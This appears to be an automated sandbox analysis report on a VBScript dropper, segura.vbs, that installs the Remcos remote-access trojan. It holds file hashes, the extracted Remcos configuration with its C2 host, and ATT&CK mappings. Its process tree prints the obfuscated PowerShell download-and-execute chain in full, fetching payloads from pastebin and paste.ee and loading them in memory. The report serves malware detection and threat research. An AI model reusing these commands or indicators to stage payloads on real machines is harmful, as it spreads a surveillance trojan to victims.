Analysis
-
max time kernel
149s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
28-11-2024 17:53
General
-
Target
segura.vbs
-
Size
1.9MB
-
MD5
753a9d435fdf6803ca970ba23d3dfe0d
-
SHA1
03aa37de89660b8d2fd9ef5aabc61a83a7f410c8
-
SHA256
cdff410d32d5b177320f80eb8bc6be51de994bd11cc17e7013ae400e1947ca6f
-
SHA512
426a53f1003bd48f4933266eecfeedfe74ea374a50b1b9ff2d969dc0333e4a9370ccb75640e08bcd0e93a3b2e9d0bbf60a5ed7fc117fef79e1f54f53c9a44c6a
-
SSDEEP
192:dG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4l:XQb7SOE9Cm6wn
Malware Config
Extracted
https://pastebin.com/raw/Adv9gBHa
https://pastebin.com/raw/Adv9gBHa
Extracted
remcos
NtPriv
wins.coemprsasltda.pro:3000
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-3L7DW9
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Remcos family
-
Blocklisted process makes network request 5 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\segura.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★QQBk★HY★OQBn★EI★S★Bh★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★FQ★ZQBo★HU★b★Bj★Gg★ZQBz★Fg★e★BY★Hg★e★★u★EM★b★Bh★HM★cw★x★Cc★Jw★g★Ck★LgBH★GU★d★BN★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBl★HQ★a★Bv★GQ★K★★g★Cc★JwBN★HM★cQBC★Ek★YgBZ★Cc★Jw★g★Ck★LgBJ★G4★dgBv★Gs★ZQ★o★C★★J★Bu★HU★b★Bs★C★★L★★g★Fs★bwBi★Go★ZQBj★HQ★WwBd★F0★I★★o★C★★Jw★n★D★★LwBV★Fg★VQBW★Dc★LwBk★C8★ZQBl★C4★ZQB0★HM★YQBw★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\segura.vbs');powershell $Yolopolhggobek;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/Adv9gBHa' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''TehulchesXxXxx.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/UXUV7/d/ee.etsap//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\segura.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps14⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD55442dd75680e78fafcd556df2c684622
SHA18ed794ce800aea0b5497edc5a794acf3a23cd587
SHA256a90d556fe4e5dd8b7c10320ac2ad25cdf161bf50c7c0dfb2f2de34e8ffa1b056
SHA5125471193b2f3be50cba397a13d2c932d512f04db2cdffda822f23bb2d7a00d29a360b7ee202f805b6280024215bef9164364c058a27358cb18e4d451623a26211
-
Filesize
3KB
MD56bf07852cb3bab59e6cc2dcab43ab011
SHA1310635401d2c6a1bd7f77df365eb6371012aee2c
SHA2565d968265d8f24ff9f80784bc6f3b5af2437781bce2b3d850db4a2bb49d0b5ad7
SHA5128dc9aec471dbd68818ed6fec05efc6570dbddbed22946765d45d4bd5482814e306674df3f3ca0845828fcc0d604d685fcec0f3f7ad9e982b30aaaa39d26134a9
-
Filesize
1KB
MD58d80c45e0e047b75073a3d1c2710c68f
SHA1babc73cf30327b36d184239a2747ec94d48929f4
SHA2566859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64
SHA5125da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
148B
MD5afe01ff31ec0a91a2d66fe057ad79f8c
SHA19db709b12eb1d9e579b32589737da2bfbede4550
SHA256f13ab70a212838dae0155a91f76fb20902013246ced03102948a1a15d3b2fe87
SHA5129e266438a5e8571ecaa0e61b5d0a8eac3231540357304fb4e52687fd4b95414d7f946cb31d2ffd0b72a836b2112f1ef3eb99cc2620b4edd6d14914154e583dc1
-
Filesize
294KB
MD599aee15396ea7abe3fb7a8adea77a17d
SHA17febdfae2f8b3aedaf6eaa0aaa1390f6b5e74d84
SHA256c29724ee264774f32eb270f952070e4c53f47d26b082a7bd7eed07dca8b9cb4c
SHA512436a676e60da7f9db2526bf0e1699b6f684d3283d330ee50badc932d3f49be7afb27484d9827fbbd0694d9b9813e845cb6da1cfca1fd6714836d72fbee561eec
-
Filesize
942B
MD5d9898296540612c96776cc5497292681
SHA10c5f5168c7df55ec35c1528ef7a782de0861d616
SHA25619ea2bcd08fc915f8dcedee0c71dd3427066f1d93edb2bd3b27054b371cc2629
SHA5125e5dcdb9e9d65ca53f533361c6a469561469703f9a95d197b81b7b1a0f53bb9e209f02e20fca48805073697c3226c3e61f5481bedea744967cf3c415bd43ff88
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB